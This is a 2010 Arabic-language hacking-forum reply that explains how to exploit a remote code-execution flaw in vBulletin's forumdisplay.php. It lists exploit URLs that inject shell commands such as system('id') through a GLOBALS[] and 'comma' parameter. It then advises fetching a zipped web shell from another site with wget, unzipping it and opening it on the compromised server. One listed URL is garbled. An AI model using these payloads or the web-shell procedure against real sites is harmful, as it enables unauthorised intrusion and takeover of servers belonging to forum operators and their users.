الموضوع: الحققققق ثغرة جديده بمنتديات vb
عرض مشاركة واحدة
قديم 08-19-2010, 07:25 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
dz-fox
 
الصورة الرمزية dz-fox
 

 
 
إحصائية العضو






dz-fox غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dz-fox is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة GuEvArA511
مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي
كود PHP:
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

   

رد مع اقتباس